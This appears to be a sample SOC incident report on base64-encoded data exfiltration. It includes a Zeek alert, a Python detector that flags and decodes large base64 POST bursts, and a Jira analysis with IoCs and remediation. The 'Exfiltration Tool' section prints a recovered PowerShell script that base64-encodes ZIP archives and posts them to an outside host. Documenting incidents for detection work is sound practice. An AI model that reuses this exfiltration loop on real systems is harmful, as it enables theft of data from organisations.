Zeek Alert Details
Alert ID: ZEEK-DATA-ENCODING-1132-7842
Alert Time: 2024-02-29 10:30:22 EST
Severity: HIGH (85/100)
Source: Zeek (Bro) Network Security Monitor
Rule: “Base64-Encoded Data in HTTP Requests – Potential Data Exfiltration”
MITRE ATT&CK: T1132.001 – Data Encoding: Standard Encoding
Alert Details:
Detection: HTTP traffic containing large amounts of base64-encoded data
Source: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination: 185.143.221[.]89:80
Time: 10:15-10:30 EST
HTTP Requests:
10:15:22 – POST /upload.php (data length: 12,847 KB, base64)
10:18:45 – POST /upload.php (data length: 14,231 KB, base64)
10:22:12 – POST /upload.php (data length: 11,984 KB, base64)
10:25:38 – POST /upload.php (data length: 13,562 KB, base64)
10:28:55 – POST /upload.php (data length: 12,456 KB, base64)
Data Analysis (Zeek extracted):
POST /upload.php HTTP/1.1
Host: 185.143.221[.]89
Content-Type: application/x-www-form-urlencoded
Content-Length: 13155328
data=UEsDBBQAAAAIAICIF1Yj…
Decoded Data (after base64 decoding):
5 ZIP archives (one per POST; the payload prefix UEsDBB… decodes to the ZIP local-file-header magic PK\x03\x04)
Each contains multiple files (documents, spreadsheets)
Total decoded size: ~45 MB (base64 inflates the on-wire size by roughly a third)
Detection Logic:
Multiple HTTP POST requests with large base64 payloads
Base64 encoding of binary data (ZIP files)
Destination IP known malicious
Pattern matches data encoding/exfiltration
SOC Investigation Process
Step                     | Action                               | Tools Used                   | Findings
1. Alert Validation      | Verify Zeek alert                    | Zeek logs, Splunk            | Confirmed base64-encoded exfiltration
2. Process Investigation | Identify process on endpoint         | CrowdStrike Falcon           | PowerShell script encoding and sending files
3. Data Analysis         | Decode and analyze exfiltrated data  | Base64 decoder, ZIP unpacker | 45 MB of stolen documents (engineering IP)
4. Immediate Action      | Isolate host                         | CrowdStrike Falcon           | ENG-WS-045 quarantined
5. C2 Blocking           | Block destination IP                 | Palo Alto firewall           | 185.143.221[.]89 blocked
6. Data Protection       | Determine what was stolen            | File audit logs              | 47 files exfiltrated (source code, designs)
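The detection logic above (repeated large POSTs to one destination, bodies that are base64-encoded ZIPs) and investigation steps 1 and 3 (validate the alert, decode the payload) can be exercised offline. The following is an added example, not code from the Zeek alert or the SOC report; it assumes Zeek http.log records exported as JSON with the real fields ts, id.orig_h, id.resp_h, method, uri and request_body_len, plus a POST body carved from the PCAP. All inputs are constructed: the hosts and timings mirror the report, the ZIP member names do not come from it.

```python
"""Detect base64-encoded ZIP exfiltration in HTTP POST bodies and validate it.

Added example; not part of the Zeek alert or SOC report. Inputs are constructed.
"""
import base64
import binascii
import io
import re
import urllib.parse
import zipfile
from collections import defaultdict

# Tunable thresholds: a "large" body rules out ordinary form posts; the burst
# condition separates staged exfiltration from a single legitimate upload.
MIN_BODY_LEN = 1_000_000        # bytes
MIN_POSTS = 3
WINDOW_SECONDS = 15 * 60

ZIP_MAGIC = b"PK\x03\x04"
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def find_large_post_bursts(records):
    """Return (orig_h, resp_h, uri) groups with >= MIN_POSTS large POSTs
    inside any WINDOW_SECONDS span (the rule's first two bullets)."""
    groups = defaultdict(list)
    for r in records:
        if r.get("method") != "POST" or r.get("request_body_len", 0) < MIN_BODY_LEN:
            continue
        groups[(r["id.orig_h"], r["id.resp_h"], r["uri"])].append(float(r["ts"]))
    hits = []
    for (orig_h, resp_h, uri), times in groups.items():
        times.sort()
        for i in range(len(times) - MIN_POSTS + 1):
            if times[i + MIN_POSTS - 1] - times[i] <= WINDOW_SECONDS:
                hits.append({"orig_h": orig_h, "resp_h": resp_h,
                             "uri": uri, "posts": len(times)})
                break
    return hits


def decode_form_field(body, field="data"):
    """Pull one field from an application/x-www-form-urlencoded body and
    base64-decode it; None if the field is missing or not valid base64."""
    params = urllib.parse.parse_qs(body, keep_blank_values=True)
    if field not in params:
        return None
    # parse_qs maps '+' to ' '. A client that posted raw base64 without
    # percent-encoding would therefore yield spaces; base64 never contains
    # spaces, so mapping them back to '+' is safe.
    b64 = params[field][0].replace(" ", "+")
    if not B64_RE.match(b64) or len(b64) % 4:
        return None
    try:
        return base64.b64decode(b64, validate=True)
    except binascii.Error:
        return None


def classify_payload(raw):
    """Name the file type behind the decoded bytes; for ZIPs list the
    members so the analyst sees what left the network."""
    if raw is None:
        return {"type": "not-base64", "members": []}
    if raw.startswith(ZIP_MAGIC):
        with zipfile.ZipFile(io.BytesIO(raw)) as zf:
            return {"type": "zip", "members": zf.namelist()}
    return {"type": "unknown-binary", "members": []}


def build_sample():
    """Constructed inputs: the five large POSTs from the report's timeline,
    benign noise, and one captured body carrying a base64 ZIP."""
    base = 1709219722.0   # 2024-02-29 10:15:22 EST as a Unix timestamp
    records = []
    for offset, size in [(0, 13155328), (203, 14572544), (410, 12271616),
                         (616, 13887488), (813, 12754944)]:
        records.append({"ts": base + offset, "id.orig_h": "192.168.45.78",
                        "id.resp_h": "185.143.221.89", "method": "POST",
                        "uri": "/upload.php", "request_body_len": size})
    # Noise: a small login post and one large upload to an internal host.
    records.append({"ts": base + 30, "id.orig_h": "192.168.45.78",
                    "id.resp_h": "10.0.0.5", "method": "POST",
                    "uri": "/login", "request_body_len": 256})
    records.append({"ts": base + 60, "id.orig_h": "192.168.45.90",
                    "id.resp_h": "10.0.0.20", "method": "POST",
                    "uri": "/share", "request_body_len": 20_000_000})
    # Hypothetical archive members; the report does not name the files.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("src/controller.py", "print('hypothetical source file')\n")
        zf.writestr("designs/part_a.step", "ISO-10303-21;\n")
    b64 = base64.b64encode(buf.getvalue()).decode()
    body = urllib.parse.urlencode({"data": b64})   # data=UEsDBB...%3D%3D
    return records, body


if __name__ == "__main__":
    records, body = build_sample()
    for hit in find_large_post_bursts(records):
        print("ALERT large-POST burst:", hit)
    print(classify_payload(decode_form_field(body)))
```

Two things the report's bullets gloss over are handled here: a single large legitimate upload does not fire (the burst needs MIN_POSTS within the window), and the form field is normalized before decoding, since a client that does not percent-encode the base64 alphabet would otherwise break the decode and look like a false negative.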
Jira Incident Report
Ticket: SOC-2024-150
Summary: T1132 – Data Exfiltration Using Base64 Encoding
Status: RESOLVED
Resolution: MALICIOUS – Data Exfiltrated, Host Isolated
Priority: P2 – MEDIUM
Labels: T1132, data-encoding, base64, exfiltration, zeek, compromised-account
Components: Network-Security, Data-Protection
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zeek Network Security Monitor.
Alert: “Base64-Encoded Data in HTTP Requests – Potential Data Exfiltration”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: 185.143.221[.]89:80.
Protocol: HTTP with base64-encoded payloads.
Time: 2024-02-29 10:30 EST.
Technique: MITRE ATT&CK T1132.001 – Data Encoding: Standard Encoding.
2. Technical Analysis:
Attack Chain:
09:30 – rpatel account compromised (phishing)
09:45 – Attacker logs into ENG-WS-045 via RDP
09:50 – Attacker collects sensitive files
09:55-10:10 – Attacker creates 5 ZIP archives
10:15-10:30 – Attacker exfiltrates via HTTP POST with base64 encoding
10:30 – Zeek detects
Encoding Technique:
Method: Base64 encoding of ZIP files
Purpose: Hide binary data in text-based protocol (HTTP)
Evasion: Bypass DLP that doesn’t inspect HTTP POST bodies
Volume: 5 POSTs, total 45 MB of original data
Exfiltrated Data:
Source code (Python, C++) – 12 files
Engineering designs (CAD) – 8 files
Project documentation – 15 files
Customer lists – 5 files
Password database – 1 file
VPN configurations – 6 files
Total: 47 files, 45 MB
Exfiltration Tool:
Process: powershell.exe
Script (recovered from ENG-WS-045; base64-encodes each staged ZIP and posts it as the "data" form field, matching the captured request body):
    $files = Get-ChildItem C:\temp\data\*.zip
    foreach ($file in $files) {
        $bytes = [System.IO.File]::ReadAllBytes($file.FullName)
        $b64 = [System.Convert]::ToBase64String($bytes)
        # A hashtable body is sent as application/x-www-form-urlencoded: data=<base64>
        $body = @{ data = $b64 }
        Invoke-WebRequest -Uri http://185.143.221[.]89/upload.php -Method POST -Body $body
    }
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
09:50-10:10 – Data collection and archiving
10:15-10:30 – Exfiltration
10:30 – Zeek alert
10:32 – SOC investigates
10:33 – Host isolated
10:34 – C2 blocked
Indicators of Compromise (IoCs):
Network:
– Destination: 185.143.221[.]89:80
– URI: /upload.php
– Pattern: HTTP POST with large base64 data
Files:
– C:\temp\data\*.zip (5 files, 45 MB total)
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked destination IP at firewall.
Terminated exfiltration process.
Disabled rpatel account.
Reset password.
Data Protection:
Determined scope of exfiltrated data (47 files, 45 MB).
Notified affected data owners.
Initiated incident response for data breach.
Host Remediation:
Reimaged host.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to data theft.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
DLP did not inspect HTTP POST bodies.
6. Business Impact:
Operational Impact: Engineering host offline.
Data Exposure: 45 MB of sensitive IP (source code, designs, customer data) exfiltrated.
Regulatory Impact: Potential GDPR breach (customer data).
7. Remediation & Prevention:
Completed Actions:
Exfiltration stopped.
Host isolated.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Implemented DLP inspection of HTTP POST bodies.
Enhanced Zeek signatures for base64 detection.
8. Conclusion:
An attacker compromised an engineering account (rpatel) via phishing, logged into ENG-WS-045 over internet-exposed RDP, and exfiltrated 45 MB of intellectual property as base64-encoded ZIP archives in five HTTP POST requests. Zeek detected the encoded-data pattern, but only after the fifth POST had completed, so the data had already left the network when the host was isolated and the account secured.
Closure Rationale: Data exfiltrated; exfiltration stopped; account secured; breach response initiated.
Analyst: [Your Name], SOC Analyst Date: 2024-02-29 11:30 EST